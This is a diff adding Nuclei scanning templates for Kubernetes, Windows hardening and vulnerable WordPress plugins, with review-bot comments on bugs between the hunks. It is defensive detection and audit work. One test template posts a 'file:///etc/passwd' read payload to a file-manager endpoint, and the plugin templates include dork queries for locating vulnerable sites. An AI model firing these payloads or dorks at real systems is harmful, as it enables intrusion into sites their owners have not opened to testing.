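        if (uid === 0 || (uid === undefined && nonRoot !== true)) {
          let result = (`Container '${container.name}' in pod '${podData.pod}' may run with root user ID.`);
          Export(result);
        }
      });
```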
--- /dev/null
+++ b/poc/other/k8s-seccomp-profile-set.yaml
@@ -0,0 +1,54 @@ +id: k8s-seccomp-profile-set + +info: + name: Set appropriate seccomp profile + author: princechaddha + severity: medium + description: Checks if the seccomp profile is set to docker/default or runtime/default in Kubernetes Deployments. + impact: | + Using a default seccomp profile helps in reducing the attack surface of the container by limiting the syscalls containers can make, which can prevent certain types of exploits. + remediation: | + Ensure that all containers in Kubernetes Deployments have a seccomp profile of docker/default or runtime/default set in their security contexts. + reference: + - https://kubernetes.io/docs/tutorials/clusters/seccomp/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,containers,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + if (container.securityContext && container.securityContext.seccompProfile && + (container.securityContext.seccompProfile.type === 'RuntimeDefault' || container.securityContext.seccompProfile.type === 'DockerDefault')) { + // No action needed, configured properly + } else { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have an appropriate seccomp profile set.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a0048304602210088b5afd30016fb2a61fd300e6a13bfa07252a0d4972eb11b70583499ab79a4c20221009aba524227d19ead61e2c75a7b2840b90b708f236054cedf8b3531fb4e3ee49b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
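Review bot: `container.securityContext.seccompProfile.type === 'DockerDefault'` is a dead branch, since the Kubernetes API only accepts `RuntimeDefault`, `Localhost` and `Unconfined` for `seccompProfile.type`; the `docker/default` spelling belongs to the deprecated annotation form, which this script does not read. The check also looks only at the container-level context, so a deployment that sets the profile at pod level (`spec.template.spec.securityContext.seccompProfile`, the form the referenced tutorial uses) is reported as missing a profile. Resolving the effective profile per container and dropping the empty `// No action needed` branch keeps the script shorter; whether a `Localhost` profile should also pass is a policy decision worth stating in the description.
```yaml
      let deployment = JSON.parse(template.deployment);
      let podSpec = deployment.spec.template.spec;
      let podProfile = (podSpec.securityContext && podSpec.securityContext.seccompProfile) || null;
      podSpec.containers.forEach(container => {
        let profile = (container.securityContext && container.securityContext.seccompProfile) || podProfile;
        if (!profile || profile.type !== 'RuntimeDefault') {
          // … unchanged: Export of the result message …
        }
      });
```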
diff --git a/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml b/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml new file mode 100644 index 0000000000..4a39bf1354 --- /dev/null +++ b/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml @@ -0,0 +1,59 @@ +id: kata-plus-36c5b8e23edc73cc63396a6195be2274 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml b/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml new file mode 100644 index 0000000000..5194f879a7 --- /dev/null +++ b/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml 
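Review bot: `description: >` is empty, `cvss-metrics`, `cvss-score` and `cve-id` under `classification` carry no value, and `shodan-query: 'vuln:'` is a generator placeholder; these fields should either be filled from the referenced Wordfence entry or removed so the template does not advertise a classification it does not have. The check itself only fingerprints the plugin version from `readme.txt` (`compare_versions(version, '<= 1.4.7')`) and does not confirm the stored XSS, so a sentence such as `Version-based detection only; the installed version is read from the plugin readme and may lag the deployed code.` belongs in the description. The same applies to the learning-management-system (both hunks), newsletters-lite, post-status-notifier, post-status-notifier-lite and premium-addons-for-elementor hunks in this commit.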
@@ -0,0 +1,59 @@ +id: learning-management-system-2928d4688fb415c9cbca95396899c99f + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Stored Cross-Site Scripting via Ask a Question Functionality + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml b/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml new file mode 100644 index 0000000000..947b657b02 --- /dev/null +++ b/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml 
@@ -0,0 +1,59 @@ +id: learning-management-system-91dd199724129d4d681d2379143caddc + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Missing Authorization to Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/other/llmnr-disabled.yaml b/poc/other/llmnr-disabled.yaml new file mode 100644 index 0000000000..36a0ce7e5f --- /dev/null +++ b/poc/other/llmnr-disabled.yaml 
@@ -0,0 +1,33 @@
+id: llmnr-disabled
+
+info:
+ name: LLMNR Disabled
+ author: princechaddha
+ severity: medium
+ description: Determine if LLMNR (Link-Local Multicast Name Resolution) is disabled.
+ impact: |
+ Enabling LLMNR can expose systems to man-in-the-middle attacks.
+ remediation: |
+ Disable LLMNR to reduce the risk of such attacks.
+ tags: windows,llmnr,network,security,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ $lmnrStatus = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -Name 'EnableMulticast' -ErrorAction SilentlyContinue
+ if ($lmnrStatus -and $lmnrStatus.EnableMulticast -eq 0) {"LLMNR is correctly disabled"} else {"LLMNR is misconfigured or enabled by default"}
+
+ matchers:
+ - type: word
+ words:
+ - "LLMNR is misconfigured or enabled by default"
\ No newline at end of file
diff --git a/poc/other/lm-hash-storage-enabled.yaml b/poc/other/lm-hash-storage-enabled.yaml
new file mode 100644
index 0000000000..2f26f78477
--- /dev/null
+++ b/poc/other/lm-hash-storage-enabled.yaml
@@ -0,0 +1,32 @@ +id: lm-hash-storage-enabled + +info: + name: LM Hash Storage Enabled + author: princechaddha + severity: high + description: Checks if LM hashes are stored, which is an insecure practice. + impact: | + Storing LM hashes can lead to easier password cracking due to the weak nature of the LM hashing algorithm. + remediation: | + Disable LM hash storage by setting the NoLMHash registry key to prevent storing weak LM hashes. + tags: windows,hashing,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'NoLMHash' + + matchers: + - type: word + words: + - "NoLmHash : 0" diff --git a/poc/other/match-3.yaml b/poc/other/match-3.yaml new file mode 100644 index 0000000000..b2e23fb993 --- /dev/null +++ b/poc/other/match-3.yaml @@ -0,0 +1,16 @@ +id: basic-get-third + +info: + name: Basic 3rd GET Request + author: tovask + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + name: test-matcher-3 + words: + - "This is test matcher text" diff --git a/poc/other/matcher-status.yaml b/poc/other/matcher-status.yaml new file mode 100644 index 0000000000..4cfd0d1a0b --- /dev/null +++ b/poc/other/matcher-status.yaml 
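Review bot: The matcher word `"NoLmHash : 0"` does not match the casing of the value the script requests one block earlier (`-Name 'NoLMHash'`), and nuclei word matchers compare case-sensitively unless told otherwise, so the template is likely never to fire even when LM hashes are stored. Either match on `- "NoLMHash : 0"` or add `case-insensitive: true` to the matcher. Note also that `Get-ItemProperty` without `-ErrorAction SilentlyContinue` errors out when the value is absent, which on hosts relying on the default leaves the state unreported rather than classified; the llmnr-disabled hunk handles the absent-value case explicitly.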
@@ -0,0 +1,40 @@ +id: matcher-status + +info: + name: Test Matcher Status + author: pdteam + severity: critical + +variables: + username: test + password: admin + date: 2023-05-31 + +http: + - method: GET + path: + - "{{RootURL}}/login?username={{username}}&password={{password}}" + - "{{BaseURL}}/admin-pannel" + + - method: GET + path: + - "{{BaseURL}}/dashboard?date={{date}}" + - "{{BaseURL}}/signup" + + - method: POST + path: + - "{{BaseURL}}/filemanager/upload.php" + body: "fldr=&url=file:///etc/passwd" + + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "matcher status" + + - type: status + status: + - 200 diff --git a/poc/other/matcher-with-nested-and.yaml b/poc/other/matcher-with-nested-and.yaml new file mode 100644 index 0000000000..9e3b080859 --- /dev/null +++ b/poc/other/matcher-with-nested-and.yaml @@ -0,0 +1,18 @@ +id: file-matcher-with-nested-and + +info: + name: File Matcher With nested AND + author: pdteam + severity: info + tags: file + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "CCC" + - "DDD" + condition: and \ No newline at end of file diff --git a/poc/other/multi-request.yaml b/poc/other/multi-request.yaml new file mode 100644 index 0000000000..4ede5e37ea --- /dev/null +++ b/poc/other/multi-request.yaml @@ -0,0 +1,26 @@ +id: http-multi-request + +info: + name: http multi request template + author: pdteam + severity: info + description: template with multiple http request with combined logic + reference: https://example-reference-link + +# requestURI is reflected back as response body here +http: + - raw: + - | + GET /ping HTTP/1.1 + Host: {{Hostname}} + + - | + GET /pong HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'body_1 == "ping"' + - 'body_2 == "pong"' + condition: and \ No newline at end of file 
diff --git a/poc/other/multimatch-value-share-template.yaml b/poc/other/multimatch-value-share-template.yaml new file mode 100644 index 0000000000..fd66975e26 --- /dev/null +++ b/poc/other/multimatch-value-share-template.yaml @@ -0,0 +1,23 @@ +id: multimatch-value-share-template + +info: + name: MultiMatch Value Share Template + author: tovask + severity: info + +http: + - path: + - "{{BaseURL}}/path1?v=1" + - "{{BaseURL}}/path1?v=2" + matchers: + - type: word + name: test-matcher + words: + - "href" + extractors: + - type: regex + part: body + name: extracted + regex: + - 'href="(.*)"' + group: 1 diff --git a/poc/other/multimatch-value-share-workflow.yaml b/poc/other/multimatch-value-share-workflow.yaml new file mode 100644 index 0000000000..f197f28864 --- /dev/null +++ b/poc/other/multimatch-value-share-workflow.yaml @@ -0,0 +1,21 @@ +id: multimatch-value-share-workflow + +info: + name: MultiMatch Value Share Workflow + author: tovask + severity: info + description: Workflow to test value sharing when multiple matches occur in the extractor template + +workflows: + - template: workflow/multimatch-value-share-template.yaml + subtemplates: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/http-value-share-template-2.yaml + - template: workflow/multimatch-value-share-template.yaml + matchers: + - name: test-matcher + subtemplates: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/http-value-share-template-2.yaml diff --git a/poc/other/multiproto.yaml b/poc/other/multiproto.yaml new file mode 100644 index 0000000000..5e8754bde1 --- /dev/null +++ b/poc/other/multiproto.yaml 
@@ -0,0 +1,30 @@ +id: nuclei-multi-protocol + +info: + name: multi protocol support + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # dns request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET + path: + - "{{BaseURL}}" # http request + + headers: + Host: "{{ssl_subject_cn}}" # host extracted from ssl request + Metadata: "{{ssl_cipher}}" + + matchers: + - type: dsl + dsl: + # - contains(http_body,'File not found') # check for http string + - http_status_code == 404 + - contains(dns_cname, 'github.io') # check for cname + condition: and \ No newline at end of file diff --git a/poc/other/multiprotocol-value-share-template.yaml b/poc/other/multiprotocol-value-share-template.yaml new file mode 100644 index 0000000000..41a2469191 --- /dev/null +++ b/poc/other/multiprotocol-value-share-template.yaml @@ -0,0 +1,22 @@ +id: multiprotocol-value-sharing-template + +info: + name: MultiProtocol Value Sharing Template + author: tovask + severity: info + +dns: + - name: "{{extracted}}" + type: PTR + matchers: + - type: word + words: + - "blog.projectdiscovery.io" + +http: + - path: + - "{{BaseURL}}/path2?extracted={{extracted}}" + matchers: + - type: word + words: + - "blog.projectdiscovery.io" diff --git a/poc/other/multiprotodynamic.yaml b/poc/other/multiprotodynamic.yaml new file mode 100644 index 0000000000..2bd3113488 --- /dev/null +++ b/poc/other/multiprotodynamic.yaml 
@@ -0,0 +1,29 @@ +id: dns-http-dynamic-values + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + + extractors: + - type: dsl + name: blogid + dsl: + - trim_suffix(cname,'.ghost.io') + internal: true + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(body,'ProjectDiscovery.io') # check for http string + - blogid == 'projectdiscovery' # check for cname (extracted information from dns response) + condition: and \ No newline at end of file diff --git a/poc/other/multiprotowithprefix.yaml b/poc/other/multiprotowithprefix.yaml new file mode 100644 index 0000000000..61dc410aed --- /dev/null +++ b/poc/other/multiprotowithprefix.yaml @@ -0,0 +1,26 @@ +id: dns-http-proto-prefix + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - trim_suffix(dns_cname,'.ghost.io') == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file diff --git a/poc/other/net-multi-step.yaml b/poc/other/net-multi-step.yaml new file mode 100644 index 0000000000..0d638fa553 --- /dev/null +++ b/poc/other/net-multi-step.yaml 
@@ -0,0 +1,32 @@ +id: network-multi-step +info: + name: network multi-step + author: tarunKoyalwar + severity: high + description: | + Network multi-step template for testing + + +javascript: + - code: | + var m = require("nuclei/net"); + var conn = m.Open("tcp",address); + conn.SetTimeout(timeout); // optional timeout + conn.Send("FIRST") + conn.RecvString(4) // READ 4 bytes i.e PING + conn.Send("SECOND") + conn.RecvString(4) // READ 4 bytes i.e PONG + conn.RecvString(6) // READ 6 bytes i.e NUCLEI + + args: + address: "{{Host}}:{{Port}}" + Host: "{{Host}}" + Port: 5431 + timeout: 3 # in sec + + matchers: + - type: dsl + dsl: + - success == true + - response == "NUCLEI" + condition: and diff --git a/poc/other/netbios-disabled.yaml b/poc/other/netbios-disabled.yaml new file mode 100644 index 0000000000..497747f724 --- /dev/null +++ b/poc/other/netbios-disabled.yaml @@ -0,0 +1,33 @@ +id: netbios-disabled + +info: + name: NetBIOS Disabled + author: princechaddha + severity: medium + description: Determine if NetBIOS over TCP/IP is disabled on all network adapters. + impact: | + Enabling NetBIOS can expose systems to network-related attacks such as traffic interception and spoofing. + remediation: | + Disable NetBIOS on all network adapters to mitigate potential security risks. + tags: windows,netbios,network,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $netbiosStatus = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_."TCP/IPNetBIOSOptions" -ne 2 } + if ($netbiosStatus) {"NetBIOS is misconfigured or enabled"} else {"NetBIOS is correctly disabled"} + + matchers: + - type: word + words: + - "NetBIOS is misconfigured or enabled" diff --git a/poc/other/network-discovery-public-enabled.yaml b/poc/other/network-discovery-public-enabled.yaml new file mode 100644 index 0000000000..b6a5d385e5 
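Review bot: `$_."TCP/IPNetBIOSOptions"` is not a property of `Win32_NetworkAdapterConfiguration`; the property is `TcpipNetbiosOptions` (0 = via DHCP, 1 = enabled, 2 = disabled), so the expression evaluates to `$null`, `$null -ne 2` is true for every adapter, and the template reports "NetBIOS is misconfigured or enabled" on every host. Adapters without IP bound also have no meaningful value here and should be excluded: `Where-Object { $_.IPEnabled -and $_.TcpipNetbiosOptions -ne 2 }`.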
--- /dev/null +++ b/poc/other/network-discovery-public-enabled.yaml @@ -0,0 +1,32 @@ +id: network-discovery-public-disabled + +info: + name: Network Discovery Disabled on Public Networks + author: princechaddha + severity: medium + description: Checks if network discovery is disabled on all public networks. + impact: | + Disabling network discovery on public networks reduces the system's visibility and minimizes the attack surface, preventing potential unauthorized access. + remediation: | + Ensure network discovery remains disabled on public networks to maintain secure network configurations. + tags: network,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if (-not (Get-NetConnectionProfile | Where-Object { $_.NetworkCategory -eq 'Public' -and $_.NetworkDiscovery -eq 'Discoverable' })) { "Network Discovery is disabled on all Public networks" } + + matchers: + - type: word + words: + - "Network Discovery is disabled on all Public networks" \ No newline at end of file diff --git a/poc/other/network-port.yaml b/poc/other/network-port.yaml new file mode 100644 index 0000000000..c1ebdfdc96 --- /dev/null +++ b/poc/other/network-port.yaml @@ -0,0 +1,21 @@ +id: network-port-example + +info: + name: Example Template with Network Port + author: pdteam + severity: high + description: This is an updated description for the network port example. + reference: https://updated-reference-link + +tcp: + - host: + - "{{Hostname}}" + port: 23846 + inputs: + - data: "PING\r\n" + read-size: 4 + matchers: + - type: word + part: data + words: + - "PONG" diff --git a/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml b/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml new file mode 100644 index 0000000000..eedde5e278 --- /dev/null +++ b/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml 
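Review bot: The word matcher fires on `"Network Discovery is disabled on all Public networks"`, i.e. on the compliant output, and the script has no `else` branch, so this template flags hardened hosts and is silent on misconfigured ones, the inverse of the llmnr-disabled and netbios-disabled hunks in this commit. Add an else branch such as `else { "Network Discovery is enabled on a Public network" }` and match on that string instead. `$_.NetworkDiscovery` does not appear to be a property exposed by `Get-NetConnectionProfile` (it reports `NetworkCategory` and connectivity state), which would make the `Where-Object` filter always empty; worth verifying on a host with discovery enabled before relying on it. The `id` (`network-discovery-public-disabled`) also disagrees with the file name (`network-discovery-public-enabled.yaml`).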
@@ -0,0 +1,59 @@ +id: newsletters-lite-e4e61a63407c312b8137011c7ea6ce20 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file diff --git a/poc/other/ns.yaml b/poc/other/ns.yaml new file mode 100644 index 0000000000..9d40655743 --- /dev/null +++ b/poc/other/ns.yaml @@ -0,0 +1,18 @@ +id: dns-ns-query-example + +info: + name: Test DNS NS Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: NS + class: inet + recursion: true + retries: 3 + matchers: + - type: word + part: all + words: + - "NS" diff --git a/poc/other/nuclei-flow-dns-prefix.yaml b/poc/other/nuclei-flow-dns-prefix.yaml new file mode 100644 index 0000000000..8d5f7906c6 --- /dev/null +++ b/poc/other/nuclei-flow-dns-prefix.yaml 
@@ -0,0 +1,40 @@ +id: nuclei-flow-dns + +info: + name: Nuclei flow dns + author: pdteam + severity: info + description: Description of the Template + reference: https://example-reference-link + +flow: | + dns(1); + template["nameservers"].forEach(nameserver => { + set("nameserver",nameserver); + dns(2); + }); + +dns: + - name: "{{FQDN}}" + type: NS + matchers: + - type: word + words: + - "IN\tNS" + extractors: + - type: regex + internal: true + name: "nameservers" + group: 1 + regex: + - "IN\tNS\t(.+)" + + - name: "{{nameserver}}" + type: A + class: inet + retries: 3 + recursion: true + extractors: + - type: dsl + dsl: + - "a" \ No newline at end of file diff --git a/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml b/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml new file mode 100644 index 0000000000..2cd060edbb --- /dev/null +++ b/poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml 
@@ -0,0 +1,59 @@ +id: post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1 + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-status-notifier/" + google-query: inurl:"/wp-content/plugins/post-status-notifier/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-status-notifier,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file diff --git a/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml b/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml new file mode 100644 index 0000000000..fc6fa48c04 --- /dev/null +++ b/poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml 
@@ -0,0 +1,59 @@ +id: post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1 + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-status-notifier-lite/" + google-query: inurl:"/wp-content/plugins/post-status-notifier-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-status-notifier-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file diff --git a/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml b/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml new file mode 100644 index 0000000000..2611d27e70 --- /dev/null +++ b/poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml 
@@ -0,0 +1,59 @@ +id: premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928 + +info: + name: > + Premium Addons for Elementor <= 4.10.60 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Video Box Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.60') \ No newline at end of file diff --git a/poc/other/privesc-agetty.yaml b/poc/other/privesc-agetty.yaml new file mode 100644 index 0000000000..51fef6b33a --- /dev/null +++ b/poc/other/privesc-agetty.yaml 
@@ -0,0 +1,41 @@
+id: privesc-agetty
+
+info:
+ name: agetty - Privilege Escalation
+ author: bobakabill
+ severity: high
+ description: |
+ The agetty command in Linux is used to invoke the /bin/login command for a given user. If the SUID bit is set, it can be used to gain a high-privilege s>
+ reference:
+ - https://gtfobins.github.io/gtfobins/agetty/
+ metadata:
+ verified: true
+ max-request: 3
+ tags: code,linux,find,privesc,local
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ find /usr/sbin/agetty -perm /4000
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ find /usr/sbin/agetty -perm /6000
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "/usr/sbin/agetty"
+
+ - type: word
+ part: code_2_response
+ words:
+ - "/usr/sbin/agetty"
+# digest: 4a0a00473045022100a538ae5a5fe0337a1441bce017745d6bd64eec5fcc941fde9708a999469ad9ce0220556e7c14a79a88d1e5e37309085d79af25d63bfd83ccb0b80d5f4857b21b
diff --git a/poc/other/ps1-snippet.yaml b/poc/other/ps1-snippet.yaml
new file mode 100644
index 0000000000..9d6c91f06d
--- /dev/null
